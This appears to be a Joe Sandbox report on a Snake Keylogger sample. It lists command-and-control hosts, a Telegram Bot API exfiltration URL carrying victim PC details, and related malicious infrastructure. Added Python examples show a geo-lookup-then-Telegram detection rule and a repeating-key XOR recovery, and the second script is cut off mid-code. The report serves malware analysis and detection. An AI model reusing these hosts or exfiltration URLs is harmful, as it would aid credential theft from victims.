https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | RegSvcs.exe, 00000001.00000002.4111428677.0000000004212000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004335000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.000000000406E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040E3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | RegSvcs.exe, 00000001.00000002.4111428677.0000000004212000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004335000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.000000000406E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040E3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000001.00000002.4110039811.0000000003153000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003144000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://varders.kozow.com:8081 | CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://aborters.duckdns.org:8081 | CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://reallyfreegeoip.org/xml/8.46.123.33$ | RegSvcs.exe, 00000001.00000002.4110039811.000000000304F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.000000000300A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a | RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://anotherarmy.dns.army:8081 | CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | RegSvcs.exe, 00000001.00000002.4111428677.0000000004310000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004049000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000041ED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/q | CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://chrome.google.com/webstore?hl=enlB | RegSvcs.exe, 00000001.00000002.4110039811.000000000314E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org | RegSvcs.exe, 00000001.00000002.4110039811.000000000304F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | RegSvcs.exe, 00000001.00000002.4111428677.0000000004310000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004049000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000041ED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/ | CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1519293
Start date and time: 2024-09-26 10:22:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: CMR_7649.EXE.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@3/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 53
• Number of non-executed functions: 300
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RegSvcs.exe, PID 3152 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: CMR_7649.EXE.exe
Time | Type | Description
04:23:03 | API Interceptor | 10124773x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | Payment Details.doc | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | TEKLİF TALEP VE FİYAT TEKLİFİ_xlsx.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger |
149.154.167.220 | Payment Slip.doc | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.com | malicious | Outlook Phishing, HTMLPhisher |
149.154.167.220 | SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe | malicious | VIP Keylogger |
149.154.167.220 | inquiry.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Confirmación de pago_shrunk.exe | malicious | AgentTesla |
149.154.167.220 | SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe | malicious | Snake Keylogger, VIP Keylogger |
188.114.96.3 | ADNOC requesting RFQ.exe | malicious | FormBook | www.chinaen.org/zi4g/
188.114.96.3 | http://twint.ch-daten.com/de/receive/bank/sgkb/79469380 | malicious | Unknown | twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
188.114.96.3 | Cbequipment-Voice Audio Interface.pdf | malicious | HTMLPhisher | www.444317.com/
188.114.96.3 | Sept order.doc | malicious | FormBook | www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
188.114.96.3 | 1eД.exe | malicious | Lokibot | dddotx.shop/Mine/PWS/fre.php
188.114.96.3 | https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH | malicious | Unknown | hdcy.emcl00.com/qRCfs/
188.114.96.3 | PO23100072.exe | malicious | FormBook | www.cc101.pro/ttiz/
188.114.96.3 | RFQ urrgently.exe | malicious | FormBook | www.1win-moldovia.fun/1g7m/
188.114.96.3 | TNT AWB TRACKING DETAILS.exe | malicious | FormBook | www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
188.114.96.3 | Petronas quotation request.exe | malicious | FormBook | www.chinaen.org/zi4g/
193.122.130.0 | Payment Details.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | QUOTATION_SEPQTRA071244úPDF.scr.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | Payment Slip.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe | malicious | VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | E-dekont.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | z84TTREMITTANCEUSD347_432_63.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | rPEDIDO-M456.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | r8x1WvSkbWSUjXh6.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
Match (domain) | Associated Sample Name / URL | Detection | Threat Name | Context
Match: reallyfreegeoip.org
  RFQ____RM quotation_JPEG IMAGE.img.exe | malicious | Snake Keylogger | 188.114.96.3
  Payment Details.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
  QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
  Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 188.114.96.3
  Payment Slip.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
  SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
  z95g0YV3PKzM3LA5zt.exe | malicious | Snake Keylogger | 188.114.96.3
  SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe | malicious | VIP Keylogger | 188.114.97.3
  inquiry.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
Match: checkip.dyndns.com
  RFQ____RM quotation_JPEG IMAGE.img.exe | malicious | Snake Keylogger | 158.101.44.242
  Payment Details.doc | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
  QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 193.122.130.0
  Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 132.226.8.169
  Payment Slip.doc | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
  SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
  z95g0YV3PKzM3LA5zt.exe | malicious | Snake Keylogger | 132.226.247.73
  SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe | malicious | VIP Keylogger | 193.122.130.0
  inquiry.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
Match: api.telegram.org
  Payment Details.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 149.154.167.220
  Payment Slip.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.com | malicious | Outlook Phishing, HTMLPhisher | 149.154.167.220
  SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe | malicious | VIP Keylogger | 149.154.167.220
  inquiry.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  Confirmaci#U00f3n de pago_shrunk.exe | malicious | AgentTesla | 149.154.167.220
  SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
Match: TELEGRAMRU
  Payment Details.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 149.154.167.220
  Payment Slip.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  http://mintlink32.vercel.app/ | malicious | HTMLPhisher | 149.154.167.99
  https://bostempek.vercel.app/ | malicious | Porn Scam | 149.154.167.99
  https://telegram-privatefree.pages.dev/ | malicious | Unknown | 149.154.167.99
  http://tes.lavender8639.workers.dev/ | malicious | Unknown | 149.154.167.99
  https://live-prons-sex.pages.dev/ | malicious | Porn Scam | 149.154.167.99
  https://telegrambot-resolved.pages.dev/ | malicious | Unknown | 149.154.167.99
Match: CLOUDFLARENETUS
  Contract_Agreement_Wednesday September 2024.pdf | malicious | Unknown | 162.159.61.3
  http://linksapp.top:443 | malicious | Unknown | 104.21.74.63
  RFQ____RM quotation_JPEG IMAGE.img.exe | malicious | Snake Keylogger | 188.114.96.3
  p37SE6gM52.exe | malicious | LummaC, Go Injector, LummaC Stealer | 104.21.37.97
  3ZD5tEC5DH.exe | malicious | LummaC | 172.67.208.139
  HpCQgSai4e.exe | malicious | FormBook | 104.21.17.90
  gvyO903Xmm.exe | malicious | FormBook | 104.21.70.136
  a7HdB2dU5P.exe | malicious | LummaC | 104.21.58.182
  iq2HxA0SLw.exe | malicious | LummaC, Go Injector, LummaC Stealer | 104.21.37.97
  Payment Details.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
Match: ORACLE-BMC-31898US
  RFQ____RM quotation_JPEG IMAGE.img.exe | malicious | Snake Keylogger | 158.101.44.242
  Payment Details.doc | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
  QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 193.122.130.0
  Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
  Payment Slip.doc | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
  http://ec44d1ee.freyy.pages.dev/Zimbra%20Web%20Client%20Sign%20In/ | malicious | Unknown | 147.154.16.196
  SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
  SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe | malicious | VIP Keylogger | 193.122.130.0
  inquiry.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
  SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
  RFQ____RM quotation_JPEG IMAGE.img.exe | malicious | Snake Keylogger | 188.114.96.3
  QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 188.114.96.3
  SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
  z95g0YV3PKzM3LA5zt.exe | malicious | Snake Keylogger | 188.114.96.3
  SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe | malicious | VIP Keylogger | 188.114.96.3
  inquiry.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
  SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
  Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
  E-dekont.exe | malicious | Snake Keylogger | 188.114.96.3
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  RFQ____RM quotation_JPEG IMAGE.img.exe | malicious | Snake Keylogger | 149.154.167.220
  RFQ -PO.20571-0001-QBMS-PRQ-0200140.js | malicious | AgentTesla, RedLine | 149.154.167.220
  QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 149.154.167.220
  450230549.exe | malicious | AgentTesla | 149.154.167.220
  450230549.exe | malicious | Unknown | 149.154.167.220
  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 149.154.167.220
  https://geminiqwc-sw.top/ | malicious | Unknown | 149.154.167.220
  http://tiktok1688.cc/ | malicious | Unknown | 149.154.167.220
  https://qwekorqw-eqo.top/ | malicious | Unknown | 149.154.167.220
  https://qwoms-dei3.top/ | malicious | Unknown | 149.154.167.220
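The context tables above tie the same three pieces of infrastructure to one run of Snake Keylogger / VIP Keylogger submissions: a public-IP or geolocation lookup (checkip.dyndns.org, checkip.dyndns.com, reallyfreegeoip.org) and the Telegram Bot API (api.telegram.org on 149.154.167.220, AS TELEGRAMRU). Neither domain is malicious on its own, so the usable detection is the ordering: a host that resolves a lookup service and then api.telegram.org a few seconds later. The following is an added example, not code from the report or from Joe Sandbox; the log schema, the host and process names and every log line are constructed for the demonstration, and the 15-minute window is a tunable assumption.

```python
"""Detection logic: public-IP/geo lookup followed by Telegram Bot API traffic.

Added example, not part of the Joe Sandbox report. The domains come from the
report's context tables; the log schema and every log line are constructed.
"""
import re
from datetime import datetime

# Domains taken from the report's context tables.
GEO_LOOKUP_DOMAINS = {"checkip.dyndns.org", "checkip.dyndns.com", "reallyfreegeoip.org"}
EXFIL_DOMAINS = {"api.telegram.org"}

# Constructed schema: "<UTC timestamp> <host> <process image> dns <query name>".
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<proc>\S+) dns (?P<qname>\S+)$")

# Constructed sample log (not from the report). ws-acct-07 models the stealer,
# ws-dev-03 a legitimate Telegram user, ws-ops-11 two unrelated events hours apart.
SAMPLE_LOG = """\
2024-09-27T09:14:02Z ws-acct-07 CMR_7649.EXE.exe dns checkip.dyndns.org
2024-09-27T09:14:03Z ws-acct-07 CMR_7649.EXE.exe dns reallyfreegeoip.org
2024-09-27T09:14:09Z ws-acct-07 CMR_7649.EXE.exe dns api.telegram.org
2024-09-27T09:20:41Z ws-dev-03 Telegram.exe dns api.telegram.org
2024-09-27T10:02:15Z ws-ops-11 curl.exe dns checkip.dyndns.org
2024-09-27T13:30:00Z ws-ops-11 updater.exe dns api.telegram.org
"""


def parse_log(text):
    """Return a list of (timestamp, host, process, query name) for matching lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unrelated or malformed line
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["host"], m["proc"], m["qname"].lower().rstrip(".")))
    return events


def find_lookup_then_telegram(events, window_seconds=900, same_process=True):
    """Return (host, process, lookup domain, exfil domain, seconds between) for
    every api.telegram.org query that follows a public-IP/geo lookup from the
    same host within window_seconds (and, by default, from the same process).
    """
    last_lookup = {}  # host -> (timestamp, process, domain) of the latest lookup
    hits = []
    for ts, host, proc, qname in sorted(events):
        if qname in GEO_LOOKUP_DOMAINS:
            last_lookup[host] = (ts, proc, qname)
        elif qname in EXFIL_DOMAINS and host in last_lookup:
            l_ts, l_proc, l_dom = last_lookup[host]
            gap = int((ts - l_ts).total_seconds())
            if gap <= window_seconds and (not same_process or l_proc == proc):
                hits.append((host, proc, l_dom, qname, gap))
    return hits


if __name__ == "__main__":
    for hit in find_lookup_then_telegram(parse_log(SAMPLE_LOG)):
        print("ALERT geo-lookup -> telegram: host=%s proc=%s %s -> %s after %ds" % hit)
```

On the constructed log only ws-acct-07 fires; ws-dev-03 never did a lookup, and ws-ops-11's two events are hours apart and from different processes. Alert on the domain names rather than on 149.154.167.220 or 188.114.96.3: the former is Telegram's own address and the latter a Cloudflare front, and both carry plenty of benign traffic.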
                                              No context
Process: C:\Users\user\Desktop\CMR_7649.EXE.exe
File Type: data
Category: dropped
Size (bytes): 274944
Entropy (8bit): 6.892827622047486
Encrypted: false
SSDEEP: 3072:sTExkzMmYemkI0epKiMWCJM/Nl0Xhbg9BsYUSmfUjHL9Yq9wBdYwINfgtsvqbmoD:sTFMmYemkIRMxm8KqSZ6kDr03PGb1I
MD5: 364C867D1C086BE9FC31AC758C7C5107
SHA1: 3E2B315AB64DBB7F7E55515DA4292AB7C9E99CF4
SHA-256: B9CBE37285665454C83BE9D9636921A1F1DC2E27E70F988ACE075EA2BA6458F0
SHA-512: 8F92C803BC991237002B5FCEB655C14A388FE298EA90200796BC5D558D8007F08D103AFF2ED15FE9C80016D6FB6E6C08D84022597B0F872EE291E051AE735E4C
Malicious: false
Reputation: low
                                              Preview:...8ZWMQINSK..KB.UDEDU6E.DYOLQIKD8YWMQMNSKBQKBJUDEDU6ECDYOLQ.KD8WH._M.Z.c.J..t.--&.51+>=-<i(%V789q/+s97?k+$u...u[*'!wBA[mKD8YWMQ..SK.PHB...#DU6ECDYO.QKJO9.WMMINS_BQKBJUJ.@U6eCDY.HQIK.8YwMQMLSKFQKBJUDE@U6ECDYOL.MKD:YWMQMNQK..KBZUDUDU6ESDY_LQIKD8IWMQMNSKBQKB.l@E.U6EC.]O[AIKD8YWMQMNSKBQKBJUD%@U:ECDYOLQIKD8YWMQMNSKBQKBJUDEDU6ECDYOLQIKD8YWMQMNSKBQKbJULEDU6ECDYOLQAkD8.WMQMNSKBQKBd!!=0U6EW^]OLqIKD$]WMSMNSKBQKBJUDEDU.EC$w=?#*KD8NGMQM.WKBCKBJK@EDU6ECDYOLQIK.8Y.c#("<(BQGBJUD%@U6GCDY.HQIKD8YWMQMNSK.QK.JUDEDU6ECDYOLQIK..]WMQMN.KBQIBOU..FU..BDZOLQ.KD>..OQ.NSKBQKBJUDEDU6ECDYOLQIKD8YWMQMNSKBQKBJUDEDU.8.K...8:.8YWMQMOQHFWCJJUDEDU6E=DYO.QIK.8YWzQMNvKBQ&BJU`EDUHECD'OLQ-KD8+WMQ,NSK.QKB%UDE*U6E=DYORSakD8S}kQOfrKB[Kh.&fED_.DCD]<oQIA.:YWI"iNSA.RKBN&aED_.ACD]<jQIA.=YWI{.NP.TWKBQ:}ED_6F.Q_OLJcmD:qmMQGNymBR.WLUD^nw6G.MYOH{.8Y8YQe.MNY?KQK@._DE@.(Gk.YOF{k5O8YSfQgl-GBQOiJ.f;IU6AhDsQN.DKD<su3_MNW`B{i<EUDAoU.[A.VOLUci:(YWIzMdq5SQKFaUng:G6EGoYen/ZKD<rWgs3ZSKFzKhh+QEDQ.Eif'YLQM`D.{)ZQMJxKhs5ZJU@nD.(G.\YOH{Oa&8+.XQ=M
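The preview of the dropped file is worth a second look: the 30-character sequence DEDU6ECDYOLQIKD8YWMQMNSKBQKBJU repeats at a fixed period, interrupted by stretches of unrelated bytes. That is exactly what a repeating-key XOR of a plaintext with long runs of 0x00 looks like, because 0x00 XOR key byte yields the key byte, and PE images and most binary payloads are full of zero padding. The report itself only says "data" and "Encrypted: false" (its entropy heuristic), so treat the XOR reading as a hypothesis. The following is an added example, not code from the report, showing how to test it on such a blob: guess the period from byte collisions at each lag, take the most frequent ciphertext byte per key position as the key (assuming 0x00 is the dominant plaintext byte), and validate the result by looking for an MZ header. The plaintext is constructed, and the page's repeating sequence is used purely as the example's key.

```python
"""Testing the repeating-key-XOR hypothesis on a blob.

Added example, not from the Joe Sandbox report. KEY is the sequence that repeats
in the report's preview, used here only as the constructed example's key; the
plaintext is constructed. The recovery assumes 0x00 is the most common
plaintext byte, which holds for PE images and most padded binary payloads.
"""
from collections import Counter
import random

KEY = b"DEDU6ECDYOLQIKD8YWMQMNSKBQKBJU"  # 30 bytes, see the preview above


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with key cycled over its length (encrypt and decrypt alike)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _build_plaintext() -> bytes:
    """Constructed plaintext: PE-like header, zero padding, some text and noise."""
    rnd = random.Random(7)
    noise = bytes(rnd.randrange(256) for _ in range(256))
    return (b"MZ\x90\x00" + b"\x00" * 200
            + b"This program cannot be run in DOS mode.\r\n"
            + b"\x00" * 300 + noise + b"\x00" * 400
            + b"PE\x00\x00" + b"\x00" * 96)


SAMPLE_PT = _build_plaintext()
SAMPLE_CT = xor_repeating(SAMPLE_PT, KEY)


def guess_key_length(ct: bytes, max_len: int = 64, tolerance: float = 0.9) -> int:
    """Lag L with the highest rate of ct[i] == ct[i+L].

    Under a repeating key, equal plaintext bytes L apart only collide in the
    ciphertext when L is a multiple of the key length (or when two key bytes
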